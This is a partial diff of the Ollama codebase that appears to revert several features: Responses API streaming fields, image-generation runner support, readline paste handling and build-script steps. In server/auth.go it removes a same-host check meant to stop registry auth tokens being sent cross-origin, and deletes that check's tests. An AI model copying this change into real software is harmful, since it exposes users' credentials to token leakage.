 	firstWrite      bool
@@ -805,12 +668,11 @@ func (c *ResponsesStreamConverter) newEvent(eventType string, data map[string]an
 }

 // NewResponsesStreamConverter creates a new converter with the given configuration.
-func NewResponsesStreamConverter(responseID, itemID, model string, request ResponsesRequest) *ResponsesStreamConverter {
+func NewResponsesStreamConverter(responseID, itemID, model string) *ResponsesStreamConverter {
 	return &ResponsesStreamConverter{
 		responseID: responseID,
 		itemID:     itemID,
 		model:      model,
-		request:    request,
 		firstWrite: true,
 	}
 }
@@ -855,120 +717,25 @@ func (c *ResponsesStreamConverter) Process(r api.ChatResponse) []ResponsesStream
 	return events
 }

-// buildResponseObject creates a full response object with all required fields for streaming events.
-func (c *ResponsesStreamConverter) buildResponseObject(status string, output []any, usage map[string]any) map[string]any {
-	var instructions any = nil
-	if c.request.Instructions != "" {
-		instructions = c.request.Instructions
-	}
-
-	truncation := "disabled"
-	if c.request.Truncation != nil {
-		truncation = *c.request.Truncation
-	}
-
-	var tools []any
-	if c.request.Tools != nil {
-		for _, t := range c.request.Tools {
-			tools = append(tools, map[string]any{
-				"type":        t.Type,
-				"name":        t.Name,
-				"description": t.Description,
-				"strict":      t.Strict,
-				"parameters":  t.Parameters,
-			})
-		}
-	}
-	if tools == nil {
-		tools = []any{}
-	}
-
-	textFormat := map[string]any{"type": "text"}
-	if c.request.Text != nil && c.request.Text.Format != nil {
-		textFormat = map[string]any{
-			"type": c.request.Text.Format.Type,
-		}
-		if c.request.Text.Format.Name != "" {
-			textFormat["name"] = c.request.Text.Format.Name
-		}
-		if c.request.Text.Format.Schema != nil {
-			textFormat["schema"] = c.request.Text.Format.Schema
-		}
-		if c.request.Text.Format.Strict != nil {
-			textFormat["strict"] = *c.request.Text.Format.Strict
-		}
-	}
-
-	var reasoning any = nil
-	if c.request.Reasoning.Effort != "" || c.request.Reasoning.Summary != "" {
-		r := map[string]any{}
-		if c.request.Reasoning.Effort != "" {
-			r["effort"] = c.request.Reasoning.Effort
-		} else {
-			r["effort"] = nil
-		}
-		if c.request.Reasoning.Summary != "" {
-			r["summary"] = c.request.Reasoning.Summary
-		} else {
-			r["summary"] = nil
-		}
-		reasoning = r
-	}
-
-	// Build top_p and temperature with defaults
-	topP := 1.0
-	if c.request.TopP != nil {
-		topP = *c.request.TopP
-	}
-	temperature := 1.0
-	if c.request.Temperature != nil {
-		temperature = *c.request.Temperature
-	}
-
-	return map[string]any{
-		"id":                   c.responseID,
-		"object":               "response",
-		"created_at":           time.Now().Unix(),
-		"completed_at":         nil,
-		"status":               status,
-		"incomplete_details":   nil,
-		"model":                c.model,
-		"previous_response_id": nil,
-		"instructions":         instructions,
-		"output":               output,
-		"error":                nil,
-		"tools":                tools,
-		"tool_choice":          "auto",
-		"truncation":           truncation,
-		"parallel_tool_calls":  true,
-		"text":                 map[string]any{"format": textFormat},
-		"top_p":                topP,
-		"presence_penalty":     0,
-		"frequency_penalty":    0,
-		"top_logprobs":         0,
-		"temperature":          temperature,
-		"reasoning":            reasoning,
-		"usage":                usage,
-		"max_output_tokens":    c.request.MaxOutputTokens,
-		"max_tool_calls":       nil,
-		"store":                false,
-		"background":           c.request.Background,
-		"service_tier":         "default",
-		"metadata":             map[string]any{},
-		"safety_identifier":    nil,
-		"prompt_cache_key":     nil,
-	}
-}
-
 func (c *ResponsesStreamConverter) createResponseCreatedEvent() ResponsesStreamEvent {
 	return c.newEvent("response.created", map[string]any{
-		"response": c.buildResponseObject("in_progress", []any{}, nil),
+		"response": map[string]any{
+			"id":     c.responseID,
+			"object": "response",
+			"status": "in_progress",
+			"output": []any{},
+		},
 	})
 }

 func (c *ResponsesStreamConverter) createResponseInProgressEvent() ResponsesStreamEvent {
 	return c.newEvent("response.in_progress", map[string]any{
-		"response": c.buildResponseObject("in_progress", []any{}, nil),
+		"response": map[string]any{
+			"id":     c.responseID,
+			"object": "response",
+			"status": "in_progress",
+			"output": []any{},
+		},
 	})
 }

@@ -995,10 +762,9 @@ func (c *ResponsesStreamConverter) processThinking(thinking string) []ResponsesS

 	// Emit delta
 	events = append(events, c.newEvent("response.reasoning_summary_text.delta", map[string]any{
-		"item_id":       c.reasoningItemID,
-		"output_index":  c.outputIndex,
-		"summary_index": 0,
-		"delta":         thinking,
+		"item_id":      c.reasoningItemID,
+		"output_index": c.outputIndex,
+		"delta":        thinking,
 	}))

 	// TODO(drifkin): consider adding
@@ -1017,10 +783,9 @@ func (c *ResponsesStreamConverter) finishReasoning() []ResponsesStreamEvent {

 	events := []ResponsesStreamEvent{
 		c.newEvent("response.reasoning_summary_text.done", map[string]any{
-			"item_id":       c.reasoningItemID,
-			"output_index":  c.outputIndex,
-			"summary_index": 0,
-			"text":          c.accumulatedThinking,
+			"item_id":      c.reasoningItemID,
+			"output_index": c.outputIndex,
+			"text":         c.accumulatedThinking,
 		}),
 		c.newEvent("response.output_item.done", map[string]any{
 			"output_index": c.outputIndex,
@@ -1133,10 +898,8 @@ func (c *ResponsesStreamConverter) processTextContent(content string) []Response
 			"output_index":  c.outputIndex,
 			"content_index": c.contentIndex,
 			"part": map[string]any{
-				"type":        "output_text",
-				"text":        "",
-				"annotations": []any{},
-				"logprobs":    []any{},
+				"type": "output_text",
+				"text": "",
 			},
 		}))
 	}
@@ -1150,7 +913,6 @@ func (c *ResponsesStreamConverter) processTextContent(content string) []Response
 		"output_index":  c.outputIndex,
 		"content_index": 0,
 		"delta":         content,
-		"logprobs":      []any{},
 	}))

 	return events
@@ -1182,10 +944,8 @@ func (c *ResponsesStreamConverter) buildFinalOutput() []any {
 			"status": "completed",
 			"role":   "assistant",
 			"content": []map[string]any{{
-				"type":        "output_text",
-				"text":        c.accumulatedText,
-				"annotations": []any{},
-				"logprobs":    []any{},
+				"type": "output_text",
+				"text": c.accumulatedText,
 			}},
 		})
 	}
@@ -1207,7 +967,6 @@ func (c *ResponsesStreamConverter) processCompletion(r api.ChatResponse) []Respo
 			"output_index":  c.outputIndex,
 			"content_index": 0,
 			"text":          c.accumulatedText,
-			"logprobs":      []any{},
 		}))

 		// response.content_part.done
@@ -1216,10 +975,8 @@ func (c *ResponsesStreamConverter) processCompletion(r api.ChatResponse) []Respo
 			"output_index":  c.outputIndex,
 			"content_index": 0,
 			"part": map[string]any{
-				"type":        "output_text",
-				"text":        c.accumulatedText,
-				"annotations": []any{},
-				"logprobs":    []any{},
+				"type": "output_text",
+				"text": c.accumulatedText,
 			},
 		}))

@@ -1232,31 +989,26 @@ func (c *ResponsesStreamConverter) processCompletion(r api.ChatResponse) []Respo
 				"status": "completed",
 				"role":   "assistant",
 				"content": []map[string]any{{
-					"type":        "output_text",
-					"text":        c.accumulatedText,
-					"annotations": []any{},
-					"logprobs":    []any{},
+					"type": "output_text",
+					"text": c.accumulatedText,
 				}},
 			},
 		}))
 	}

 	// response.completed
-	usage := map[string]any{
-		"input_tokens":  r.PromptEvalCount,
-		"output_tokens": r.EvalCount,
-		"total_tokens":  r.PromptEvalCount + r.EvalCount,
-		"input_tokens_details": map[string]any{
-			"cached_tokens": 0,
-		},
-		"output_tokens_details": map[string]any{
-			"reasoning_tokens": 0,
-		},
-	}
-	response := c.buildResponseObject("completed", c.buildFinalOutput(), usage)
-	response["completed_at"] = time.Now().Unix()
 	events = append(events, c.newEvent("response.completed", map[string]any{
-		"response": response,
+		"response": map[string]any{
+			"id":     c.responseID,
+			"object": "response",
+			"status": "completed",
+			"output": c.buildFinalOutput(),
+			"usage": map[string]any{
+				"input_tokens":  r.PromptEvalCount,
+				"output_tokens": r.EvalCount,
+				"total_tokens":  r.PromptEvalCount + r.EvalCount,
+			},
+		},
 	}))

 	return events
--- a/openai/responses_test.go
+++ b/openai/responses_test.go
@@ -850,7 +850,7 @@ func TestFromResponsesRequest_Images(t *testing.T) {
 }

 func TestResponsesStreamConverter_TextOnly(t *testing.T) {
-	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
+	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")

 	// First chunk with content
 	events := converter.Process(api.ChatResponse{
@@ -916,7 +916,7 @@ func TestResponsesStreamConverter_TextOnly(t *testing.T) {
 }

 func TestResponsesStreamConverter_ToolCalls(t *testing.T) {
-	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
+	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")

 	events := converter.Process(api.ChatResponse{
 		Message: api.Message{
@@ -952,7 +952,7 @@ func TestResponsesStreamConverter_ToolCalls(t *testing.T) {
 }

 func TestResponsesStreamConverter_Reasoning(t *testing.T) {
-	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
+	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")

 	// First chunk with thinking
 	events := converter.Process(api.ChatResponse{
@@ -1267,7 +1267,7 @@ func TestToResponse_WithReasoning(t *testing.T) {
 			Content:  "The answer is 42",
 		},
 		Done: true,
-	}, ResponsesRequest{})
+	})

 	// Should have 2 output items: reasoning + message
 	if len(response.Output) != 2 {
@@ -1638,7 +1638,7 @@ func TestFromResponsesRequest_ShorthandFormats(t *testing.T) {

 func TestResponsesStreamConverter_OutputIncludesContent(t *testing.T) {
 	// Verify that response.output_item.done includes content field for messages
-	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
+	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")

 	// First chunk
 	converter.Process(api.ChatResponse{
@@ -1686,7 +1686,7 @@ func TestResponsesStreamConverter_OutputIncludesContent(t *testing.T) {

 func TestResponsesStreamConverter_ResponseCompletedIncludesOutput(t *testing.T) {
 	// Verify that response.completed includes the output array
-	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
+	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")

 	// Process some content
 	converter.Process(api.ChatResponse{
@@ -1730,7 +1730,7 @@ func TestResponsesStreamConverter_ResponseCompletedIncludesOutput(t *testing.T)

 func TestResponsesStreamConverter_ResponseCreatedIncludesOutput(t *testing.T) {
 	// Verify that response.created includes an empty output array
-	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
+	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")

 	events := converter.Process(api.ChatResponse{
 		Message: api.Message{Content: "Hi"},
@@ -1757,7 +1757,7 @@ func TestResponsesStreamConverter_ResponseCreatedIncludesOutput(t *testing.T) {

 func TestResponsesStreamConverter_SequenceNumbers(t *testing.T) {
 	// Verify that events include incrementing sequence numbers
-	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
+	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")

 	events := converter.Process(api.ChatResponse{
 		Message: api.Message{Content: "Hello"},
@@ -1791,7 +1791,7 @@ func TestResponsesStreamConverter_SequenceNumbers(t *testing.T) {

 func TestResponsesStreamConverter_FunctionCallStatus(t *testing.T) {
 	// Verify that function call items include status field
-	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b", ResponsesRequest{})
+	converter := NewResponsesStreamConverter("resp_123", "msg_456", "gpt-oss:20b")

 	events := converter.Process(api.ChatResponse{
 		Message: api.Message{
--- a/progress/stepbar.go
+++ b/progress/stepbar.go
@@ -1,33 +0,0 @@
-package progress
-
-import (
-	"fmt"
-	"strings"
-)
-
-// StepBar displays step-based progress (e.g., for image generation steps).
-type StepBar struct {
-	message string
-	current int
-	total   int
-}
-
-func NewStepBar(message string, total int) *StepBar {
-	return &StepBar{message: message, total: total}
-}
-
-func (s *StepBar) Set(current int) {
-	s.current = current
-}
-
-func (s *StepBar) String() string {
-	percent := float64(s.current) / float64(s.total) * 100
-	barWidth := s.total
-	empty := barWidth - s.current
-
-	// "Generating   0% ▕         ▏ 0/9"
-	return fmt.Sprintf("%s %3.0f%% ▕%s%s▏ %d/%d",
-		s.message, percent,
-		strings.Repeat("█", s.current), strings.Repeat(" ", empty),
-		s.current, s.total)
-}
--- a/readline/readline.go
+++ b/readline/readline.go
@@ -5,7 +5,6 @@ import (
 	"fmt"
 	"io"
 	"os"
-	"strings"
 )

 type Prompt struct {
@@ -37,11 +36,10 @@ type Terminal struct {
 }

 type Instance struct {
-	Prompt      *Prompt
-	Terminal    *Terminal
-	History     *History
-	Pasting     bool
-	pastedLines []string
+	Prompt   *Prompt
+	Terminal *Terminal
+	History  *History
+	Pasting  bool
 }

 func New(prompt Prompt) (*Instance, error) {
@@ -176,8 +174,6 @@ func (i *Instance) Readline() (string, error) {
 		case CharEsc:
 			esc = true
 		case CharInterrupt:
-			i.pastedLines = nil
-			i.Prompt.UseAlt = false
 			return "", ErrInterrupt
 		case CharPrev:
 			i.historyPrev(buf, &currentLineBuf)
@@ -192,23 +188,7 @@ func (i *Instance) Readline() (string, error) {
 		case CharForward:
 			buf.MoveRight()
 		case CharBackspace, CharCtrlH:
-			if buf.IsEmpty() && len(i.pastedLines) > 0 {
-				lastIdx := len(i.pastedLines) - 1
-				prevLine := i.pastedLines[lastIdx]
-				i.pastedLines = i.pastedLines[:lastIdx]
-				fmt.Print(CursorBOL + ClearToEOL + CursorUp + CursorBOL + ClearToEOL)
-				if len(i.pastedLines) == 0 {
-					fmt.Print(i.Prompt.Prompt)
-					i.Prompt.UseAlt = false
-				} else {
-					fmt.Print(i.Prompt.AltPrompt)
-				}
-				for _, r := range prevLine {
-					buf.Add(r)
-				}
-			} else {
-				buf.Remove()
-			}
+			buf.Remove()
 		case CharTab:
 			// todo: convert back to real tabs
 			for range 8 {
@@ -231,28 +211,13 @@ func (i *Instance) Readline() (string, error) {
 		case CharCtrlZ:
 			fd := os.Stdin.Fd()
 			return handleCharCtrlZ(fd, i.Terminal.termios)
-		case CharCtrlJ:
-			i.pastedLines = append(i.pastedLines, buf.String())
-			buf.Buf.Clear()
-			buf.Pos = 0
-			buf.DisplayPos = 0
-			buf.LineHasSpace.Clear()
-			fmt.Println()
-			fmt.Print(i.Prompt.AltPrompt)
-			i.Prompt.UseAlt = true
-			continue
-		case CharEnter:
+		case CharEnter, CharCtrlJ:
 			output := buf.String()
-			if len(i.pastedLines) > 0 {
-				output = strings.Join(i.pastedLines, "\n") + "\n" + output
-				i.pastedLines = nil
-			}
 			if output != "" {
 				i.History.Add(output)
 			}
 			buf.MoveToEnd()
 			fmt.Println()
-			i.Prompt.UseAlt = false

 			return output, nil
 		default:
--- a/runner/runner.go
+++ b/runner/runner.go
@@ -3,7 +3,6 @@ package runner
 import (
 	"github.com/ollama/ollama/runner/llamarunner"
 	"github.com/ollama/ollama/runner/ollamarunner"
-	imagerunner "github.com/ollama/ollama/x/imagegen/runner"
 )

 func Execute(args []string) error {
@@ -12,19 +11,12 @@ func Execute(args []string) error {
 	}

 	var newRunner bool
-	var imageRunner bool
-	if len(args) > 0 && args[0] == "--ollama-engine" {
+	if args[0] == "--ollama-engine" {
 		args = args[1:]
 		newRunner = true
 	}
-	if len(args) > 0 && args[0] == "--image-engine" {
-		args = args[1:]
-		imageRunner = true
-	}

-	if imageRunner {
-		return imagerunner.Execute(args)
-	} else if newRunner {
+	if newRunner {
 		return ollamarunner.Execute(args)
 	} else {
 		return llamarunner.Execute(args)
--- a/scripts/build_darwin.sh
+++ b/scripts/build_darwin.sh
@@ -60,7 +60,7 @@ _build_darwin() {
            cmake --install $BUILD_DIR --component MLX
            # Override CGO flags to point to the amd64 build directory
            MLX_CGO_CFLAGS="-O3 -I$(pwd)/$BUILD_DIR/_deps/mlx-c-src -mmacosx-version-min=14.0"
-            MLX_CGO_LDFLAGS="-ldl -lc++ -framework Accelerate -mmacosx-version-min=14.0"
+            MLX_CGO_LDFLAGS="-L$(pwd)/$BUILD_DIR/lib/ollama -lmlxc -lmlx -Wl,-rpath,@executable_path -lc++ -framework Accelerate -mmacosx-version-min=14.0"
        else
            BUILD_DIR=build
            cmake --preset MLX \
@@ -71,12 +71,10 @@ _build_darwin() {
            cmake --install $BUILD_DIR --component MLX
            # Use default CGO flags from mlx.go for arm64
            MLX_CGO_CFLAGS="-O3 -I$(pwd)/$BUILD_DIR/_deps/mlx-c-src -mmacosx-version-min=14.0"
-            MLX_CGO_LDFLAGS="-lc++ -framework Metal -framework Foundation -framework Accelerate -mmacosx-version-min=14.0"
+            MLX_CGO_LDFLAGS="-L$(pwd)/$BUILD_DIR/lib/ollama -lmlxc -lmlx -Wl,-rpath,@executable_path -lc++ -framework Metal -framework Foundation -framework Accelerate -mmacosx-version-min=14.0"
        fi
-        GOOS=darwin GOARCH=$ARCH CGO_ENABLED=1 CGO_CFLAGS="$MLX_CGO_CFLAGS" CGO_LDFLAGS="$MLX_CGO_LDFLAGS" go build -tags mlx -o $INSTALL_PREFIX .
-        # Copy MLX libraries to same directory as executable for dlopen
-        cp $INSTALL_PREFIX/lib/ollama/libmlxc.dylib $INSTALL_PREFIX/
-        cp $INSTALL_PREFIX/lib/ollama/libmlx.dylib $INSTALL_PREFIX/
+        GOOS=darwin GOARCH=$ARCH CGO_ENABLED=1 CGO_CFLAGS="$MLX_CGO_CFLAGS" CGO_LDFLAGS="$MLX_CGO_LDFLAGS" go build -tags mlx -o $INSTALL_PREFIX/imagegen ./x/imagegen/cmd/engine
+        GOOS=darwin GOARCH=$ARCH CGO_ENABLED=1 go build -o $INSTALL_PREFIX .
    done
 }

@@ -84,17 +82,19 @@ _sign_darwin() {
    status "Creating universal binary..."
    mkdir -p dist/darwin
    lipo -create -output dist/darwin/ollama dist/darwin-*/ollama
+    lipo -create -output dist/darwin/imagegen dist/darwin-*/imagegen
    chmod +x dist/darwin/ollama
+    chmod +x dist/darwin/imagegen

    if [ -n "$APPLE_IDENTITY" ]; then
-        for F in dist/darwin/ollama dist/darwin-*/lib/ollama/*; do
+        for F in dist/darwin/ollama dist/darwin-*/lib/ollama/* dist/darwin/imagegen; do
            codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier ai.ollama.ollama --options=runtime $F
        done

        # create a temporary zip for notarization
        TEMP=$(mktemp -u).zip
        ditto -c -k --keepParent dist/darwin/ollama "$TEMP"
-        xcrun notarytool submit "$TEMP" --wait --timeout 20m --apple-id $APPLE_ID --password $APPLE_PASSWORD --team-id $APPLE_TEAM_ID
+        xcrun notarytool submit "$TEMP" --wait --timeout 10m --apple-id $APPLE_ID --password $APPLE_PASSWORD --team-id $APPLE_TEAM_ID
        rm -f "$TEMP"
    fi

@@ -154,38 +154,38 @@ _build_macapp() {
    mkdir -p dist/Ollama.app/Contents/Resources
    if [ -d dist/darwin-amd64 ]; then
        lipo -create -output dist/Ollama.app/Contents/Resources/ollama dist/darwin-amd64/ollama dist/darwin-arm64/ollama
+        lipo -create -output dist/Ollama.app/Contents/Resources/imagegen dist/darwin-amd64/imagegen dist/darwin-arm64/imagegen
        for F in dist/darwin-amd64/lib/ollama/*mlx*.dylib ; do
            lipo -create -output dist/darwin/$(basename $F) $F dist/darwin-arm64/lib/ollama/$(basename $F)
        done
        cp dist/darwin-*/lib/ollama/*.so dist/darwin-*/lib/ollama/*.dylib dist/Ollama.app/Contents/Resources/
        cp dist/darwin/*.dylib dist/Ollama.app/Contents/Resources/
-        # Copy MLX metallib (architecture-independent, just use arm64 version)
-        cp dist/darwin-arm64/lib/ollama/*.metallib dist/Ollama.app/Contents/Resources/ 2>/dev/null || true
    else
        cp -a dist/darwin/ollama dist/Ollama.app/Contents/Resources/ollama
        cp dist/darwin/*.so dist/darwin/*.dylib dist/Ollama.app/Contents/Resources/
    fi
+    cp -a dist/darwin/imagegen dist/Ollama.app/Contents/Resources/imagegen
    chmod a+x dist/Ollama.app/Contents/Resources/ollama

    # Sign
    if [ -n "$APPLE_IDENTITY" ]; then
        codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier ai.ollama.ollama --options=runtime dist/Ollama.app/Contents/Resources/ollama
-        for lib in dist/Ollama.app/Contents/Resources/*.so dist/Ollama.app/Contents/Resources/*.dylib dist/Ollama.app/Contents/Resources/*.metallib ; do
+        for lib in dist/Ollama.app/Contents/Resources/*.so dist/Ollama.app/Contents/Resources/*.dylib dist/Ollama.app/Contents/Resources/imagegen ; do
            codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier ai.ollama.ollama --options=runtime ${lib}
        done
        codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier com.electron.ollama --deep --options=runtime dist/Ollama.app
    fi

    rm -f dist/Ollama-darwin.zip
-    ditto -c -k --norsrc --keepParent dist/Ollama.app dist/Ollama-darwin.zip
-    (cd dist/Ollama.app/Contents/Resources/; tar -cf - ollama *.so *.dylib *.metallib 2>/dev/null) | gzip -9vc > dist/ollama-darwin.tgz
+    ditto -c -k --keepParent dist/Ollama.app dist/Ollama-darwin.zip
+    (cd dist/Ollama.app/Contents/Resources/; tar -cf - ollama imagegen *.so *.dylib) | gzip -9vc > dist/ollama-darwin.tgz

    # Notarize and Staple
    if [ -n "$APPLE_IDENTITY" ]; then
-        $(xcrun -f notarytool) submit dist/Ollama-darwin.zip --wait --timeout 20m --apple-id "$APPLE_ID" --password "$APPLE_PASSWORD" --team-id "$APPLE_TEAM_ID"
+        $(xcrun -f notarytool) submit dist/Ollama-darwin.zip --wait --timeout 10m --apple-id "$APPLE_ID" --password "$APPLE_PASSWORD" --team-id "$APPLE_TEAM_ID"
        rm -f dist/Ollama-darwin.zip
        $(xcrun -f stapler) staple dist/Ollama.app
-        ditto -c -k --norsrc --keepParent dist/Ollama.app dist/Ollama-darwin.zip
+        ditto -c -k --keepParent dist/Ollama.app dist/Ollama-darwin.zip

        rm -f dist/Ollama.dmg

@@ -206,7 +206,7 @@ _build_macapp() {
        rm -f dist/rw*.dmg

        codesign -f --timestamp -s "$APPLE_IDENTITY" --identifier ai.ollama.ollama --options=runtime dist/Ollama.dmg
-        $(xcrun -f notarytool) submit dist/Ollama.dmg --wait --timeout 20m --apple-id "$APPLE_ID" --password "$APPLE_PASSWORD" --team-id "$APPLE_TEAM_ID"
+        $(xcrun -f notarytool) submit dist/Ollama.dmg --wait --timeout 10m --apple-id "$APPLE_ID" --password "$APPLE_PASSWORD" --team-id "$APPLE_TEAM_ID"
        $(xcrun -f stapler) staple dist/Ollama.dmg
    else
        echo "WARNING: Code signing disabled, this bundle will not work for upgrade testing"
--- a/scripts/build_linux.sh
+++ b/scripts/build_linux.sh
@@ -48,12 +48,53 @@ if echo $PLATFORM | grep "amd64" > /dev/null; then
        .
 fi

+# Deduplicate CUDA libraries across mlx_* and cuda_* directories
+deduplicate_cuda_libs() {
+    local base_dir="$1"
+    echo "Deduplicating CUDA libraries in ${base_dir}..."
+
+    # Find all mlx_cuda_* directories
+    for mlx_dir in "${base_dir}"/lib/ollama/mlx_cuda_*; do
+        [ -d "${mlx_dir}" ] || continue
+
+        # Extract CUDA version (e.g., v12, v13)
+        cuda_version=$(basename "${mlx_dir}" | sed 's/mlx_cuda_//')
+        cuda_dir="${base_dir}/lib/ollama/cuda_${cuda_version}"
+
+        # Skip if corresponding cuda_* directory doesn't exist
+        [ -d "${cuda_dir}" ] || continue
+
+        echo "  Checking ${mlx_dir} against ${cuda_dir}..."
+
+        # Find all .so* files in mlx directory
+        find "${mlx_dir}" -type f -name "*.so*" | while read mlx_file; do
+            filename=$(basename "${mlx_file}")
+            cuda_file="${cuda_dir}/${filename}"
+
+            # Skip if file doesn't exist in cuda directory
+            [ -f "${cuda_file}" ] || continue
+
+            # Compare checksums
+            mlx_sum=$(sha256sum "${mlx_file}" | awk '{print $1}')
+            cuda_sum=$(sha256sum "${cuda_file}" | awk '{print $1}')
+
+            if [ "${mlx_sum}" = "${cuda_sum}" ]; then
+                echo "    Deduplicating ${filename}"
+                # Calculate relative path from mlx_dir to cuda_dir
+                rel_path="../cuda_${cuda_version}/${filename}"
+                rm -f "${mlx_file}"
+                ln -s "${rel_path}" "${mlx_file}"
+            fi
+        done
+    done
+}
+
 # Run deduplication for each platform output directory
 if echo $PLATFORM | grep "," > /dev/null ; then
-    $(dirname $0)/deduplicate_cuda_libs.sh "./dist/linux_amd64"
-    $(dirname $0)/deduplicate_cuda_libs.sh "./dist/linux_arm64"
+    deduplicate_cuda_libs "./dist/linux_amd64"
+    deduplicate_cuda_libs "./dist/linux_arm64"
 elif echo $PLATFORM | grep "amd64\|arm64" > /dev/null ; then
-    $(dirname $0)/deduplicate_cuda_libs.sh "./dist"
+    deduplicate_cuda_libs "./dist"
 fi

 # buildx behavior changes for single vs. multiplatform
--- a/scripts/deduplicate_cuda_libs.sh
+++ b/scripts/deduplicate_cuda_libs.sh
@@ -1,60 +0,0 @@
-#!/bin/sh
-#
-# Deduplicate CUDA libraries across mlx_* and cuda_* directories
-# This script finds identical .so* files in mlx_cuda_* directories that exist
-# in corresponding cuda_* directories and replaces them with symlinks.
-#
-
-set -eu
-
-if [ $# -eq 0 ]; then
-    echo "ERROR: No directory specified" >&2
-    echo "Usage: $0 <base_directory>" >&2
-    exit 1
-fi
-
-base_dir="$1"
-
-if [ ! -d "${base_dir}" ]; then
-    echo "ERROR: Directory ${base_dir} does not exist" >&2
-    exit 1
-fi
-
-echo "Deduplicating CUDA libraries in ${base_dir}..."
-
-# Find all mlx_cuda_* directories
-for mlx_dir in "${base_dir}"/lib/ollama/mlx_cuda_*; do
-    [ -d "${mlx_dir}" ] || continue
-
-    # Extract CUDA version (e.g., v12, v13)
-    cuda_version=$(basename "${mlx_dir}" | sed 's/mlx_cuda_//')
-    cuda_dir="${base_dir}/lib/ollama/cuda_${cuda_version}"
-
-    # Skip if corresponding cuda_* directory doesn't exist
-    [ -d "${cuda_dir}" ] || continue
-
-    echo "  Checking ${mlx_dir} against ${cuda_dir}..."
-
-    # Find all .so* files in mlx directory
-    find "${mlx_dir}" -type f -name "*.so*" | while read mlx_file; do
-        filename=$(basename "${mlx_file}")
-        cuda_file="${cuda_dir}/${filename}"
-
-        # Skip if file doesn't exist in cuda directory
-        [ -f "${cuda_file}" ] || continue
-
-        # Compare checksums
-        mlx_sum=$(sha256sum "${mlx_file}" | awk '{print $1}')
-        cuda_sum=$(sha256sum "${cuda_file}" | awk '{print $1}')
-
-        if [ "${mlx_sum}" = "${cuda_sum}" ]; then
-            echo "    Deduplicating ${filename}"
-            # Calculate relative path from mlx_dir to cuda_dir
-            rel_path="../cuda_${cuda_version}/${filename}"
-            rm -f "${mlx_file}"
-            ln -s "${rel_path}" "${mlx_file}"
-        fi
-    done
-done
-
-echo "Deduplication complete"
--- a/server/auth.go
+++ b/server/auth.go
@@ -50,17 +50,12 @@ func (r registryChallenge) URL() (*url.URL, error) {
 	return redirectURL, nil
 }

-func getAuthorizationToken(ctx context.Context, challenge registryChallenge, originalHost string) (string, error) {
+func getAuthorizationToken(ctx context.Context, challenge registryChallenge) (string, error) {
 	redirectURL, err := challenge.URL()
 	if err != nil {
 		return "", err
 	}

-	// Validate that the realm host matches the original request host to prevent sending tokens cross-origin.
-	if redirectURL.Host != originalHost {
-		return "", fmt.Errorf("realm host %q does not match original host %q", redirectURL.Host, originalHost)
-	}
-
 	sha256sum := sha256.Sum256(nil)
 	data := []byte(fmt.Sprintf("%s,%s,%s", http.MethodGet, redirectURL.String(), base64.StdEncoding.EncodeToString([]byte(hex.EncodeToString(sha256sum[:])))))

--- a/server/auth_test.go
+++ b/server/auth_test.go
@@ -1,113 +0,0 @@
-package server
-
-import (
-	"context"
-	"strings"
-	"testing"
-	"time"
-)
-
-func TestGetAuthorizationTokenRejectsCrossDomain(t *testing.T) {
-	tests := []struct {
-		realm        string
-		originalHost string
-		wantMismatch bool
-	}{
-		{"https://example.com/token", "example.com", false},
-		{"https://example.com/token", "other.com", true},
-		{"https://example.com/token", "localhost:8000", true},
-		{"https://localhost:5000/token", "localhost:5000", false},
-		{"https://localhost:5000/token", "localhost:6000", true},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.originalHost, func(t *testing.T) {
-			ctx, cancel := context.WithTimeout(context.Background(), 100*time.Millisecond)
-			defer cancel()
-
-			challenge := registryChallenge{Realm: tt.realm, Service: "test", Scope: "repo:x:pull"}
-			_, err := getAuthorizationToken(ctx, challenge, tt.originalHost)
-
-			isMismatch := err != nil && strings.Contains(err.Error(), "does not match")
-			if tt.wantMismatch && !isMismatch {
-				t.Errorf("expected domain mismatch error, got: %v", err)
-			}
-			if !tt.wantMismatch && isMismatch {
-				t.Errorf("unexpected domain mismatch error: %v", err)
-			}
-		})
-	}
-}
-
-func TestParseRegistryChallenge(t *testing.T) {
-	tests := []struct {
-		input                             string
-		wantRealm, wantService, wantScope string
-	}{
-		{
-			`Bearer realm="https://auth.example.com/token",service="registry",scope="repo:foo:pull"`,
-			"https://auth.example.com/token", "registry", "repo:foo:pull",
-		},
-		{
-			`Bearer realm="https://r.ollama.ai/v2/token",service="ollama",scope="-"`,
-			"https://r.ollama.ai/v2/token", "ollama", "-",
-		},
-		{"", "", "", ""},
-	}
-
-	for _, tt := range tests {
-		result := parseRegistryChallenge(tt.input)
-		if result.Realm != tt.wantRealm || result.Service != tt.wantService || result.Scope != tt.wantScope {
-			t.Errorf("parseRegistryChallenge(%q) = {%q, %q, %q}, want {%q, %q, %q}",
-				tt.input, result.Realm, result.Service, result.Scope,
-				tt.wantRealm, tt.wantService, tt.wantScope)
-		}
-	}
-}
-
-func TestRegistryChallengeURL(t *testing.T) {
-	challenge := registryChallenge{
-		Realm:   "https://auth.example.com/token",
-		Service: "registry",
-		Scope:   "repo:foo:pull repo:bar:push",
-	}
-
-	u, err := challenge.URL()
-	if err != nil {
